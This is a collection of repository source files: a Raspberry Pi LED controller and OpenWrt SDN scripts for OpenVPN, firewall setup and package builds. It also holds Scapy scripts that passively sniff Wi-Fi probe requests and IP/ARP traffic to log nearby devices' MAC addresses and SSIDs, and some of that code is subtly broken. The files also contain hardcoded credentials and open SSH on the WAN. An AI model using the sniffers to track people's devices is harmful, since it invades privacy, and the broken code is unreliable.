"blob_id": "fd1bed11cc79462608733b4699894e752663c2ad",
"content_id": "ede5ae8aec9c227b49fe4ebf6688bbdcf1ea4f90",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5061,
"license_type": "no_license",
"max_line_length": 299,
"num_lines": 176,
"path": "/SW/ServerSide/LEDs.py",
"repo_name": "honzasram/LED-RPi-controler",
"src_encoding": "UTF-8",
"text": "\n#!/usr/bin/python\nimport sys\nsys.path.append(\"/home/pi/PWM\")\nfrom Adafruit_PWM_Servo_Driver import PWM\nimport time\nimport threading\nimport MySQLdb\nimport colorsys\nimport os\n\n#main dealing with arguments\nif len(sys.argv)>1:\n if sys.argv[1]==\"debug\":\n debug = True\nelse:\n debug = False\n sys.stdout = open('program.log','a')\n\n#pidfile dealing\npid = os.getpid()\nprint str(pid)\npidfile = open('/var/run/program.pid','w')\npidfile.write(str(pid))\npidfile.close()\nos.nice(-10)\n\n#set up main variables\nprogram=0\nsl=0.01\nGh=0.0\ns=0.0\nl=0.0\nrun=0\n\n#setup for PWM modul\npwm = PWM(0x40, debug=True);\npwm.setPWMFreq(1000);\npwm.setPWM(15,0,4095)\nledField = []\n\nclass ledChannel:\n r=0\n g=0\n b=0\n rb=0\n number=0\n program = 0\n step=0\n sleep=0\n h=0\n l = 0.5\n s = 1\n Pmodul = None\n global Gh\n def __init__(self,number,name,Pmodul):\n self.number = number\n self.name = name\n self.Pmodul = Pmodul\n self.lock = threading.Lock()\n\n def __repr__(self):\n return \"-----------------------------------------\\n\"+str(self.number)+\", \"+str(self.name)+\"\\nthis is color of this channel r:\"+str(self.r)+\" g:\"+str(self.g)+\"b:\"+str(self.b)+\"\\n program is \"+str(self.program)+\", also step and sleep is:\"+str(self.step)+\" \"+str(self.sleep)+\"\\n\\n\\n\\n\";\n\n def __str__(self):\n return \"-----------------------------------------\\n\"+str(self.number)+\", \"+str(self.name)+\"\\nthis is color of this channel r:\"+str(self.r)+\" g:\"+str(self.g)+\"b:\"+str(self.b)+\"\\n program is \"+str(self.program)+\", also step and sleep is:\"+str(self.step)+\" \"+str(self.sleep)+\"\\n\\n\\n\\n\";\n\n def setColor(self, r,g,b):\n self.r = r\n self.b = b\n self.g = g\n\n def setHLS(self,h,l,s):\n color = colorsys.hls_to_rgb(h, l, s);\n #print color\n self.r=color[0]*255\n self.g=color[1]*255\n self.b=color[2]*255\n\n def updateDir(self):\n #print \"R>\"+str(int(16*self.r))+\" G>\"+str( int(16*self.g))+\" B>\"+str( int(16*self.b))\n self.Pmodul.setPWM(1+3*self.number-1,0,int(16*self.r));\n self.Pmodul.setPWM(2+3*self.number-1,0,int(16*self.g));\n self.Pmodul.setPWM(3+3*self.number-1,0,int(16*self.b));\n\n def update(self):\n if self.program == 0:\n #print \"still normal color\"\n self.Pmodul.setPWM(1+3*self.number-1,0,int(16*self.r));\n self.Pmodul.setPWM(2+3*self.number-1,0,int(16*self.g));\n self.Pmodul.setPWM(3+3*self.number-1,0,int(16*self.b));\n return;\n\n if self.program == 1:\n self.h += self.step\n self.setHLS(self.h,self.l,self.s)\n self.updateDir()\n\n if self.program == 2:\n self.setHLS(Gh,self.l,self.s)\n self.updateDir()\n\n#pocatecni naplneni pole s kanaly, zde se bude tahat jmeno z databaze\nfor i in range(0,5):\n temp = ledChannel(i,\"this is chanel nmbr:\"+str(i),pwm)\n ledField.append(temp)\n\n\ndef mysql():\n db=MySQLdb.connect(host='localhost',user='led',passwd='led',db='LED')\n cur = db.cursor()\n cur.execute(\"SELECT * FROM mainColors LIMIT 5;\")\n p=0\n for row in cur.fetchall() :\n program=int(row[4])\n h=row[1]\n s=row[3]\n l=row[2]\n sleep = row[6]\n step = row[5]\n #print row\n if program == 0:\n ledField[p].setHLS(h,l,s)\n ledField[p].program = program\n ledField[p].step = step\n ledField[p].sleep = sleep\n if program == 1:\n ledField[p].program = program\n ledField[p].step = step\n ledField[p].sleep = sleep\n ledField[p].l = l\n ledField[p].s = s\n if program == 2:\n ledField[p].program = program\n ledField[p].step = step\n ledField[p].sleep = sleep\n ledField[p].l = l\n ledField[p].s = s\n #print ledField[p]\n p+=1\n\n cur.close()\n db.close()\n\ndef updateField():\n update = False\n updateStep = 0\n global Gh\n for i in range(0,5):\n ledField[i].update();\n if ledField[i].program == 2:\n update = True\n updateStep = ledField[i].step\n if update:\n Gh+=updateStep\n\ndef end():\n ending = open(\"/home/pi/PWM/end.sys\",\"r\")\n if ending.read(4)==\"True\":\n out(\"ENDING APP by end file\")\n ending.close()\n e=open('/home/pi/PWM/end.sys','w')\n e.write('False')\n exit()\n\n\ntry:\n while 1:\n end()\n mysql()\n updateField()\n #print ledField\n time.sleep(sl)\nexcept KeyboardInterrupt:\n ledField[1].program = 0\n updateField()\n exit()\n\n"
}
] | 6 |
houzhenggang/openwrtSDN
|
https://github.com/houzhenggang/openwrtSDN
|
51b0593d7bedb173735aeff7f584ef437141c250
|
49690da69c5e627bac946b9050dcc4b4fb313761
|
59eaaa9ab1c157996b4f8768bcf997b5df72c46e
|
refs/heads/master
| 2021-01-18T04:47:53.290990 | 2015-01-22T07:56:48 | 2015-01-22T07:56:48 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7111111283302307,
"alphanum_fraction": 0.7222222089767456,
"avg_line_length": 29,
"blob_id": "00b5a8aac4d2b5c2180f3c743b441b1537586231",
"content_id": "5e558ae970da2eef93d0e9c454cf53ebeb51e41f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 90,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 3,
"path": "/packages/iipr/files/etc/openvpn/down-ibvpn.sh",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\niptables --table nat --delete POSTROUTING --out-interface $2 --jump MASQUERADE\n"
},
{
"alpha_fraction": 0.7526746392250061,
"alphanum_fraction": 0.7627438902854919,
"avg_line_length": 38.650001525878906,
"blob_id": "42d86ae305dcc23bed2b7299fcb525b1f05fcda0",
"content_id": "04d34c8d09cbb65a83b9c7c7adc2acf7aa21e851",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1589,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 40,
"path": "/scripts/build.sh",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": " # rather than a functioning script this serves as a form of documentation of what might have transpired\n # but it would be pretty cool if it could be reliably reproduced\n\n sudo apt-get install subversion build-essential libncurses5-dev zlib1g-dev gawk flex quilt git-core\n cd projects/openwrt/12.09\n git clone git://git.openwrt.org/12.09/openwrt.git\n cd projects/openwrt/12.09/openwrt/\n git pull\n cp feeds.conf.default feeds.conf\n echo 'src-git openvswitch git://github.com/schuza/openvswitch.git' >> feeds.conf\n ./scripts/feeds update \n ./scripts/feeds install sflowovsd\n ./scripts/feeds install tspc\n ./scripts/feeds install gw6c\n ./scripts/feeds install odhcp6c\n ./scripts/feeds install openvpn\n ./scripts/feeds install luci\n ./scripts/feeds install iperf\n ./scripts/feeds install netperf\n ./scripts/feeds install simplejson\n ./scripts/feeds install python\n ./scripts/feeds install pyusb python-pcap python-curl python-event\n ./scripts/feeds install quagga\n ./scripts/feeds install haproxy\n ./scripts/feeds install wifidog\n ./scripts/feeds install lldpd\n ./scripts/feeds install igmpproxy\n ./scripts/feeds install gevent\n ./scripts/feeds install confuse\n ./scripts/feeds install tinc\n ./scripts/feeds install ipvsadm\n ./scripts/feeds install keepalived\n ./scripts/feeds install pypcap python-ifconfig python-json pysqlite twisted\n ./scripts/feeds install -a -p openvswitch\n ./scripts/feeds update luci\n echo '# CONFIG_KERNEL_BRIDGE is not set' >> .config\n cp /tmp/Makefile feeds/openvswitch/openvswitch/\n make menuconfig\n #make defconfig \n make\n\n"
},
{
"alpha_fraction": 0.38089480996131897,
"alphanum_fraction": 0.3857315480709076,
"avg_line_length": 31.090909957885742,
"blob_id": "1511a480d0c1420e640952e23ecd5272c25fa938",
"content_id": "fa7440b714ee461c22ef37bb49f6078631e8bd34",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 827,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 22,
"path": "/python/scapy/sniffarpip.py",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n\nimport sys\nfrom scapy.all import *\n\n# Run this script to fetch IPs and ARPs\ninterface = sys.argv[1] \nunique = []\n\ndef sniffarpip(p):\n if p.haslayer(IP):\n ip = p.sprintf(\"IP - [%IP.src%)|(%IP.dst%)]\")\n if unique.count(ip) == 0:\n unique.append(ip)\n print ip\n elif p.haslayer(ARP):\n arp = p.sprintf(\"ARP - [%ARP.hwsrc%)|(%ARP.psrc%)]-[%ARP.hwdst%)|(%ARP.pdst%)]\")\n if unique.count(arp) == 0:\n unique.append(arp)\n print arp\n \nsniff(iface=interface,prn=sniffarpip, store=0)\n \n"
},
{
"alpha_fraction": 0.6049515604972839,
"alphanum_fraction": 0.6275565028190613,
"avg_line_length": 24.77777862548828,
"blob_id": "a342bf227056742d8676aec4177cff3cd9fb2670",
"content_id": "df82bc4b8ad7509eac82aa44a2db13828313023c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1858,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 72,
"path": "/python/scapy/probe1.py",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom threading import Thread\nfrom Queue import Queue, Empty\nfrom scapy.all import *\nimport sys\n\nm_iface = \"ra0\"\nm_finished = False\nunique_client_macs = []\nunique_ap_macs = []\nm_queue = Queue.Queue()\n\ndef sniffDot11(p):\t\n global m_queue\n if not p.haslayer(Dot11Beacon):\t\n if unique_ap_macs.count(p.addr2) == 0: \n unique_ap_macs.append(p.addr2)\n print p.sprintf(\"Found new client -> [%Dot11.addr1%][%Dot11.addr2%][%Dot11Elt.info%]\")\n if p.haslayer(Dot11Beacon):\n if unique_client_macs.count(p.addr2) == 0:\n unique_client_macs.append(p.addr2)\n print p.sprintf(\"Found new AP --> %Dot11.addr2%[%Dot11Elt.info%|%Dot11Beacon.cap%]\")\n m_queue.put(p)\n \n\ndef plain_sniff():\n sniff(iface=\"ra0\",prn=sniffDot11,store=0)\n\ndef print_summary(pkt):\n print pkt.summary()\n\ndef threaded_sniff_target(q):\n global m_finished\n sniff(iface=\"ra0\",prn=sniffDot11,store=0)\n# sniff(iface = m_iface, count = 10, filter = \"icmp and src {0}\".format(m_dst), prn = lambda x : q.put(x))\n m_finished = True\n\ndef threaded_sniff():\n global m_queue\n m_queue = Queue.Queue()\n sniffer = Thread(target = threaded_sniff_target, args = (m_queue,))\n sniffer.daemon = True\n sniffer.start()\n while (not m_finished):\n try:\n pkt = m_queue.get(timeout = 1)\n print_summary(pkt)\n print \"Send new client to DIPNUM server\"\n except Empty:\n pass\n\n# \ndef threaded_sniff_with_send():\n global m_queue\n m_queue = Queue.Queue()\n sniffer = Thread(target = threaded_sniff_target, args = (m_queue,))\n sniffer.daemon = True\n sniffer.start()\n while (not m_finished):\n send(IP(dst = m_dst) / ICMP())\n try:\n pkt = m_queue.get(timeout = 1)\n print_summary(pkt)\n except Empty:\n pass\n\n\n#plain_sniff()\n\nthreaded_sniff()\n\n\n"
},
{
"alpha_fraction": 0.5559845566749573,
"alphanum_fraction": 0.5945945978164673,
"avg_line_length": 23.66666603088379,
"blob_id": "08941b2f16afce23a06760af8b5b5dba18827c4b",
"content_id": "c3222cd3be04878ddbded498f3d3d6f8b15e3523",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 518,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 21,
"path": "/python/scapy/non-beacon-probes.py",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom scapy.all import *\nimport sys\n\ninterface = sys.argv[1] \nunique = []\n\ndef sniffNonBeacon(p):\t\n if not p.haslayer(Dot11Beacon):\t\n if unique.count(p.addr2) == 0: \n unique.append(p.addr2)\n print p.sprintf(\"[%Dot11.addr1%][%Dot11.addr2%][%Dot11Elt.info%]\")\n''' \n\tprint \"add\", p.addr2\n\tprint p.summary()\n if unique.count(p.addr2) == 0: \n unique.append(p.addr2)\n'''\n\nsniff(iface=interface,prn=sniffNonBeacon,store=0)\n"
},
{
"alpha_fraction": 0.7628865838050842,
"alphanum_fraction": 0.7752577066421509,
"avg_line_length": 22.047618865966797,
"blob_id": "cb94249d19c03d91938219b71fffa649a74645fd",
"content_id": "baf5d743ef077b210cf45f6c97e04fd40ded79d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 970,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 42,
"path": "/notes/installing-gevent.md",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "\n#Building python gevent and greenlets \n\nRefs:\n\n[OpenWRT building a single package](http://wiki.openwrt.org/doc/howtobuild/single.package)\n\n[OpenWRT Buildroot - Usage](http://wiki.openwrt.org/doc/howto/build)\n\nSkip optional section 3 - feeds\n\nDo everything until make menuconfig\n\n*including* install feeds:\n\n\t./scripts/feeds update -a\n\t./scripts/feeds install -a\n\ncopy in the gevent and greenlet dirs to package/. renaming greenlet to python-greenlet\n\nedit .config to include the lines:\n\n\tCONFIG_PACKAGE_gevent=y\n\tCONFIG_PACKAGE_cython=y\n\tCONFIG_PACKAGE_python-greenlet=y\n\nthen make defconfig (this may be at wrong point??)\n\n\tmake tools/install\n\tmake toolchain/install\n\tmake package/gevent/compile\n\nThis will fail\n\t\n\tcd build_dir/target-mips_r2_uClibc-0.9.33.2/gevent-1.0rc2\n\tmake\n\tcd ..\n\tmake package/gevent/compile\n\tmake package/gevent/install\n\tmake package/python-greenlet/compile\n\tmake package/python-greenlet/install\n\nThe package should be in bin/ar71xx/packages/\n\n"
},
{
"alpha_fraction": 0.5472440719604492,
"alphanum_fraction": 0.7362204790115356,
"avg_line_length": 30.625,
"blob_id": "40bbb823afee950e7b99050305fe9c4e641c7431",
"content_id": "aa518d7832224ecc4244d7c1065d53ad0277302f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 254,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 8,
"path": "/packages/iipr/files/etc/openvpn/up.sh",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\nACTION=ifup DEVICE=tun0 INTERFACE=vpn /sbin/hotplug-call iface\n#/sbin/ifconfig tun0 10.8.0.238 pointopoint 10.8.0.237 mtu 1500\n#/etc/openvpn/up.sh tun0 1500 1560 10.8.0.238 10.8.0.237 init\n/sbin/ifconfig tun0 $4 pointopoint $5 mtu $2\n\nexit 0\n\n"
},
{
"alpha_fraction": 0.6209850311279297,
"alphanum_fraction": 0.6520342826843262,
"avg_line_length": 19.755556106567383,
"blob_id": "338b750dae12a4e3c9c2cb00f5283e1555efbab2",
"content_id": "a2f006802f900b83dd9990e04d6612c8e905ecb2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 934,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 45,
"path": "/packages/iipr/files/etc/uci-defaults/luci-start",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\nservices=\"olsrd quagga tinyproxy hsflowd haproxy sflowovsd relayd wifidog keepalived\" \n\nfor service in ${services} ; do \n\n/etc/init.d/${service} enabled && {\n\t/etc/init.d/${service} stop\n\t/etc/init.d/${service} disable\n}\n\ndone\n\nopenvpn --mktun --dev tap0\nifconfig tap0 0.0.0.0 promisc up\n\ncat << EOF >> /etc/config/network\n\nconfig interface 'vpn'\n option proto 'static'\n option ifname 'tap0'\n option dns '8.8.8.8 156.154.70.1'\nEOF\n\ncat << EOF >> /etc/config/firewall\n#Allow SSH\nconfig rule\n option src wan\n option proto tcp\n option dest_port 22\n option target ACCEPT\nEOF\n\nuci add firewall rule\nuci set firewall.@rule[-1].src=wan\nuci set firewall.@rule[-1].target=ACCEPT\nuci set firewall.@rule[-1].proto=tcp\nuci set firewall.@rule[-1].dest_port=22\nuci commit firewall\n/etc/init.d/firewall restart\n\n\ntouch /tmp/.luci-start.run\n\nexit 0\n"
},
{
"alpha_fraction": 0.6468531489372253,
"alphanum_fraction": 0.7167832255363464,
"avg_line_length": 26.410959243774414,
"blob_id": "a29ce3d3bf885893f74eddc6915f6912d225ce4a",
"content_id": "d0081117166a53e4b3d52d41618a3b6871ac4d22",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 2002,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 73,
"path": "/packages/rtl819xc/Makefile",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#\n# Copyright (C) 2007-2012 OpenWrt.org\n#\n# This is free software, licensed under the GNU General Public License v2.\n# See /LICENSE for more information.\n#\n\ninclude $(TOPDIR)/rules.mk\ninclude $(INCLUDE_DIR)/kernel.mk\n\nPKG_NAME:=rtl819xc\n\n#PKG_VERSION:=v3.4.4_4749.20120806\nPKG_VERSION:=v4.0.2_9000.20130911\nPKG_RELEASE:=1\n#PKG_SOURCE_URL:=ftp://WebUser:[email protected]/cn/wlan\nPKG_SOURCE_URL:=http://iipr.com/sources/\nPKG_MD5SUM:=5f15575ba6ae58cae485e8060bc771ed\n\n#PKG_SOURCE:=RTL819xC_USB_linux_$(PKG_VERSION).zip\nPKG_SOURCE:=RTL8188C_8192C_USB_linux_$(PKG_VERSION).zip\nPKG_BUILD_DIR:=$(KERNEL_BUILD_DIR)/RTL8188C_8192C_USB_linux_$(PKG_VERSION)\nPKG_BUILD_PARALLEL:=1\n\nPKG_DRIVERS = 8192cu\n\ninclude $(INCLUDE_DIR)/package.mk\n\nWMENU:=Wireless Drivers\n\ndefine KernelPackage/rtl819xc\n\tSUBMENU:=$(WMENU)\n\tTITLE=Realtek 8192C USB WiFi\n\tURL:=http://http://www.realtek.com.tw/\n\tDEPENDS:= +wireless-tools @USB_SUPPORT\n\tFILES:= $(PKG_BUILD_DIR)/8192cu.ko\n\tAUTOLOAD:=$(call AutoLoad,21,8192cu)\nendef\n\ndefine KernelPackage/rtl819xc/description\nRealtek's linux drivers for the Realtek 8192C USB WiFi\nendef\n\nMAKE_OPTS:= \\\n\tCROSS_COMPILE=\"$(KERNEL_CROSS)\" \\\n\tARCH=\"$(LINUX_KARCH)\" \\\n\t$(foreach opt,$(CONFOPTS),CONFIG_$(opt)=m) \\\n\tCONFIG_RTL8192CU=$(if $(CONFIG_PACKAGE_kmod-rtl819xc),m) \\\n\tKLIB_BUILD=\"$(LINUX_DIR)\" \\\n\tKSRC=\"$(LINUX_DIR)\" \\\n\tMODPROBE=true \\\n\tKLIB=$(TARGET_MODULES_DIR) \\\n\tKERNEL_SUBLEVEL=$(lastword $(subst ., ,$(KERNEL_PATCHVER))) \\\n\tKBUILD_LDFLAGS_MODULE_PREREQ=\n\ndefine Build/Prepare\n\trm -rf $(PKG_BUILD_DIR)\n\tmkdir -p $(PKG_BUILD_DIR)\n\tunzip -d $(PKG_BUILD_DIR)/.. $(DL_DIR)/$(PKG_SOURCE) RTL8188C_8192C_USB_linux_$(PKG_VERSION)/driver/*\n\t$(TAR) -C $(PKG_BUILD_DIR) -xzf $(PKG_BUILD_DIR)/driver/*.tar.gz --strip-components 1\n\trm -rf $(PKG_BUILD_DIR)/driver\nendef\n\ndefine Build/Compile/kmod\n\trm -rf $(PKG_BUILD_DIR)/modules\n\t$(MAKE) $(PKG_JOBS) -C \"$(PKG_BUILD_DIR)\" $(MAKE_OPTS) modules\nendef\n\ndefine Build/Compile\n\t$(call Build/Compile/kmod)\nendef\n\n$(eval $(call KernelPackage,rtl819xc))\n\n"
},
{
"alpha_fraction": 0.6584992408752441,
"alphanum_fraction": 0.6860643029212952,
"avg_line_length": 49.07692337036133,
"blob_id": "be679c9d5baebba3dc03d13f94295581bca6d6cc",
"content_id": "931eedae10a9f67692c6d6a97170893696dd5550",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 653,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 13,
"path": "/packages/iipr/files/etc/openvpn/up-ibvpn.sh",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\nACTION=ifup DEVICE=$2 INTERFACE=vpn /sbin/hotplug-call iface\n \n/sbin/ifconfig $2 $5 netmask $6 mtu $3 # broadcast 23.19.88.255\niptables --table nat --append POSTROUTING --out-interface $2 --jump MASQUERADE\n \n# mv /tmp/resolv.conf /tmp/resolv.conf.bak\n# echo $foreign_option_1 | sed -e 's/dhcp-option DOMAIN/domain/g' -e 's/dhcp-option DNS/nameserver/g' > /tmp/resolv.conf\n# echo $foreign_option_2 | sed -e 's/dhcp-option DOMAIN/domain/g' -e 's/dhcp-option DNS/nameserver/g' >> /tmp/resolv.conf\n# echo $foreign_option_3 | sed -e 's/dhcp-option DOMAIN/domain/g' -e 's/dhcp-option DNS/nameserver/g' >> /tmp/resolv.conf\n \nexit 0\n\n\n"
},
{
"alpha_fraction": 0.6456885933876038,
"alphanum_fraction": 0.66489577293396,
"avg_line_length": 26.494382858276367,
"blob_id": "0c0d3f4062830041904261123804d063213e8850",
"content_id": "c54beefe42b5439fb0b3cee7693c5f22e1a863cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2447,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 89,
"path": "/packages/iipr/files/etc/openvpn/ibvpn_start.sh",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "sleep 5\n\nmkdir /tmp/ibvpn\n\necho \"-----BEGIN CERTIFICATE-----\nMIIDeDCCAuGgAwIBAgIJAMVKgpjMPUfxMA0GCSqGSIb3DQEBBQUAMIGFMQswCQYD\nVQQGEwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNjbzEVMBMG\nA1UEChMMRm9ydC1GdW5zdG9uMRgwFgYDVQQDEw9Gb3J0LUZ1bnN0b24gQ0ExITAf\nBgkqhkiG9w0BCQEWEm1lQG15aG9zdC5teWRvbWFpbjAeFw0xMDA3MjExOTU5MzVa\nFw0yMDA3MTgxOTU5MzVaMIGFMQswCQYDVQQGEwJVUzELMAkGA1UECBMCQ0ExFTAT\nBgNVBAcTDFNhbkZyYW5jaXNjbzEVMBMGA1UEChMMRm9ydC1GdW5zdG9uMRgwFgYD\nVQQDEw9Gb3J0LUZ1bnN0b24gQ0ExITAfBgkqhkiG9w0BCQEWEm1lQG15aG9zdC5t\neWRvbWFpbjCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAz23m3BXY5Asiw8Dx\nT4F6feqsp+pIx6ivftTniyUCbSAxI1J1s1x75DzxmUpIwPu5xavzgPXgZr8FT81X\nJGqF9km4AE95iddJawKx0wNgdTo7GximQq9rw0dsQIB5hZZQ9TJwHC3VOnmEic5A\nOawKOCybMcRs8saLakZOgh7Xc+UCAwEAAaOB7TCB6jAdBgNVHQ4EFgQUeRhE2N4l\nXwL4H1dbjkZ4ou6fj3AwgboGA1UdIwSBsjCBr4AUeRhE2N4lXwL4H1dbjkZ4ou6f\nj3ChgYukgYgwgYUxCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMM\nU2FuRnJhbmNpc2NvMRUwEwYDVQQKEwxGb3J0LUZ1bnN0b24xGDAWBgNVBAMTD0Zv\ncnQtRnVuc3RvbiBDQTEhMB8GCSqGSIb3DQEJARYSbWVAbXlob3N0Lm15ZG9tYWlu\nggkAxUqCmMw9R/EwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQUFAAOBgQASt0pl\nWzVseQLTNM8Mlgw4ZnGAv/x2xnijmMqrkE+F7pnaOicGpxgCfMKzjZuJu0TNJqF2\nfibE7GhMdomD4dLFgIu8Wb5E7iQ1CSBEOGumRhK8qCsDzjr7WXUdhqA6Xvo+ylU6\nDMzy0Wn3NNvfGC+qxOgybYCJwDnVPi0CEDSbzQ==\n-----END CERTIFICATE-----\" > /tmp/ibvpn/ibvpn.com.crt\n\necho \"#!/bin/sh\ncase \\\"\\$1\\\" in\n up) export action=\\\"up\\\" ;;\n down) export action=\\\"down\\\" ;;\n *) echo \\\"No action specified.\\\" && exit 1 ;;\nesac\n \nif [ \\\"\\$action\\\" = \\\"up\\\" ]; then\n mv /tmp/resolv.conf /tmp/resolv.conf.bak\n echo \\$foreign_option_1 | sed -e 's/dhcp-option DOMAIN/domain/g' -e 's/dhcp-option DNS/nameserver/g' > /tmp/resolv.conf\n echo \\$foreign_option_2 | sed -e 's/dhcp-option DOMAIN/domain/g' -e 's/dhcp-option DNS/nameserver/g' >> /tmp/resolv.conf\n echo \\$foreign_option_3 | sed -e 's/dhcp-option DOMAIN/domain/g' -e 's/dhcp-option DNS/nameserver/g' >> /tmp/resolv.conf\n iptables --table nat --append POSTROUTING --out-interface \\$2 --jump MASQUERADE\nfi\n\nif [ \\\"\\$action\\\" = \\\"down\\\" ]; then\n mv /tmp/resolv.conf.bak /tmp/resolv.conf\n iptables --table nat --delete POSTROUTING --out-interface \\$2 --jump MASQUERADE\nfi\" > /tmp/ibvpn/change_resolv_conf.sh\n\nchmod 755 /tmp/ibvpn/change_resolv_conf.sh\n\necho \"remote us4.ibvpn.com 1194 udp\nclient\ndev tap\nresolv-retry infinite\nnobind\npersist-key\nmute-replay-warnings\nca /tmp/ibvpn/ibvpn.com.crt\nlog-append /tmp/ibvpn/vpn.log\ncomp-lzo\nverb 3\nmute 20\nns-cert-type server\nfragment 1300\nroute-method exe\nroute-delay 2\nauth-user-pass /tmp/ibvpn/user.conf\nauth-retry nointeract\nreneg-sec 0\nscript-security 3 system\nup \\\"/tmp/ibvpn/change_resolv_conf.sh up\\\"\ndown \\\"/tmp/ibvpn/change_resolv_conf.sh down\\\"\" > /tmp/ibvpn/server.ovpn\n\necho \"#!/bin/sh\nif [ \\$(ps | grep openvpn | grep -v grep | wc -l | tr -s \\\"\\n\\\") -eq 0 ];\nthen openvpn --daemon --config /tmp/ibvpn/server.ovpn;\nfi\" > /tmp/ibvpn/check_vpn\n\nchmod 755 /tmp/ibvpn/check_vpn\n\necho \"#!/bin/sh\ncase \\$1 in\n \\\"start\\\" )\n ntpclient pool.ntp.org\n killall openvpn\n echo \\\"Launching OpenVPN process\\\"\n sed -i 's/remote.*/remote '\\$2' 1194 udp/g' /tmp/ibvpn/server.ovpn\n openvpn --daemon --config /tmp/ibvpn/server.ovpn\n sleep 10\n if [ \\$(route -n | grep '0.0.0.0.*tap' | wc -l) = 2 ]; then\n echo \"VPN ON\"\n else\n echo \"VPN Error\"\n fi\n echo \\\"* * * * * root /tmp/ibvpn/check_vpn\\\" > /tmp/crontab\n stopservice cron && startservice cron\n;;\n \\\"stop\\\" )\n echo \\\"Stoping OpenVPN Process\\\"\n sed -i 's/.*check_vpn.*//' /tmp/crontab\n stopservice cron && startservice cron\n killall openvpn\n;;\nesac\nreturn 0\" > /tmp/ibvpn/vpn\n\nchmod 755 /tmp/ibvpn/vpn\n\necho \"[email protected]\nVpnPassword\" > /tmp/ibvpn/user.conf\n"
},
{
"alpha_fraction": 0.6840579509735107,
"alphanum_fraction": 0.7115942239761353,
"avg_line_length": 24.07272720336914,
"blob_id": "7368312b2da3a9602d1dfa23fe92024c44493404",
"content_id": "2687742d7a200ea61f4a7315bcad2e5e10fb6917",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 1380,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 55,
"path": "/packages/python-scapy/Makefile",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#\n# Copyright (C) 2012 OpenWrt.org\n#\n# This is free software, licensed under the GNU General Public License v2.\n# See /LICENSE for more information.\n#\n\ninclude $(TOPDIR)/rules.mk\n\nPKG_NAME:=scapy\nPKG_VERSION:=2.2.0\n#PKG_RELEASE:=dev\n\nPKG_SOURCE:=scapy-$(PKG_VERSION)-dev.tar.gz\nPKG_SOURCE_URL:=https://pypi.python.org/packages/source/s/scapy/\nPKG_MD5SUM:=1a5115d1f33548501d01d735bd689f13\n\nPKG_BUILD_DIR:=$(BUILD_DIR)/$(PKG_NAME)-$(PKG_VERSION)-dev\nPKG_BUILD_DEPENDS:=python\n\ninclude $(INCLUDE_DIR)/package.mk\n$(call include_mk, python-package.mk)\n\ndefine Package/python-scapy\n SUBMENU:=Python\n SECTION:=lang\n CATEGORY:=Languages\n TITLE:=python-scapy\n URL:=http://www.secdev.org/projects/scapy/\n DEPENDS:=+python +libpcap +libdnet +pypcap\n MAINTAINER:[email protected]\nendef\n\ndefine Package/python-scapy/description\n Scapy is a powerful interactive packet manipulation program.\nendef\n\ndefine Build/Compile\n\t$(INSTALL_DIR) $(PKG_INSTALL_DIR)$(PYTHON_PKG_DIR)\n\t$(CP) \\\n\t\t$(PKG_BUILD_DIR)/scapy \\\n \t\t$(PKG_INSTALL_DIR)$(PYTHON_PKG_DIR)\nendef\n\ndefine 